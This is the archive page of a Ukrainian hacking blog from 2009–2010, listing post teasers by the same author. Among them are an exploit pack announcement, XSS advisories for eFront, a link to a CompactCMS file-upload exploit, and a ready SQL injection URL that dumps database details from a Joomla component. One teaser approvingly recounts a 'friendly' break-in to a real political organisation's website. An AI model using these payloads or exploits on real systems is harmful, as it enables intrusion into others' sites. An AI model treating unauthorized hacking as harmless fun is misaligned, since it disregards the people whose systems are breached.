Archive

Author Archive

SALO PACK – Зв’язка сплойтів (exploit pack)

February 19th, 2010 Dimi4 4 comments

SALO PACK © UASC

by n0153r, Dimi4

  • Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
  • вигляді може бути розцінено як порушення закону!
  • Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях

Read more…

Система виявлення вторгнень AntiBdoor

February 6th, 2010 Dimi4 4 comments

AntiBdoor є безкоштовною, вузловою СВВ, з відкритим вихідним кодом (Host-based IDS, HIDS). Вона забезпечує аналіз цілісності файлів, виявлення потенційно небезпечних програм, активні заходи у відповідь на загрозу.

Для розробки системи використано технології PHP, SQL, XHTML, CSS, AJAX. Read more…

Добуваєм трафік з Google Wave :)

January 25th, 2010 Dimi4 11 comments

Google Wave
Виявляється з Google Wave можна досить легко добути трохи унікальних відвідувачів на свій блог. На цю вразливість наштовхнув мене life_is_shit, за що йому велике спасибі :) . Отже як це зробити читаєм під катом ;) Read more…

Categories: Security, Tips & Tricks Tags:

Вітання з Новим роком!

January 1st, 2010 Dimi4 2 comments

З новим роком, друзі!

Кохай, радій і диво відбудеться
Годинник старий б’є дванадцятий раз
Повір у мрію і бажання збудуться
Загадуй їх швидше, поки є час
Кохай, радій, світ сповнений радості
Свято дарує нам казку одвічну
І те, що не сталось, неодмінно станеться
У ніч новорічну

Categories: Other Tags:

Міжсайтовий скриптинг в Efront 3.5.5

December 29th, 2009 Dimi4 No comments

27.10.09
Програма: efront
Версія 3.5.5
Рівень небезпеки: Низький

Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.

На сайті efrontlearning.net запевняють що в релізі 2009/11/23 v3.5.5 build 5208 :

• Added additional sanitization to eliminate xss attacks

Read more…

Міжсайтовий скриптинг в Efront

December 27th, 2009 Dimi4 6 comments

27.10.09
Програма: efront
Версія 3.5.3
Рівень небезпеки: Низький

Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.

Вразливість існує через недостатню фільтрацію вхідних данних  в параметрах “lessons_ID“, “message” в сценарії index.php. Read more…

Google Wave: Інвайти

October 31st, 2009 Dimi4 49 comments

Сьогодні я став щасливчиком та магічним способом отримав інвайт на Google Wave! А сталось це так: зайшов гмейл, та побачив лист з наступним повідомленням: (як отримати інвайт – читайте далі)
Read more…

CompactCMS Remote Arbitrary File Upload Exploit

October 15th, 2009 Dimi4 4 comments

Писав вже давно, лежало в RoA на античаті,  тепер думаю немає ніякого сенсу зберігати його в приваті.

http://uasc.org.ua/files/compactcms.php.txt
Read more…

Вразливості компонентів Joomla/Mambo (01)

October 12th, 2009 Dimi4 No comments

Компонент: Projects

Тип вразливості: SQL-injection

Знайдено: 27.09.2009

Знайшов: Dimi4
index?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Read more…

Дружній взлом КУН (Конгрес Українських Націоналістів)

September 20th, 2009 Dimi4 4 comments

Привіт всім) Все розпачалось з того шо побачив я лінк на сайт Конгресу Українських Націоналістів (далі КУН) http://cun.org.ua/ukr/. Трішки помучився з дирявим модулем альбому(опис на мілвормі побачив), вирішив подивитись реверс-іп. Read more…

Categories: Security Tags: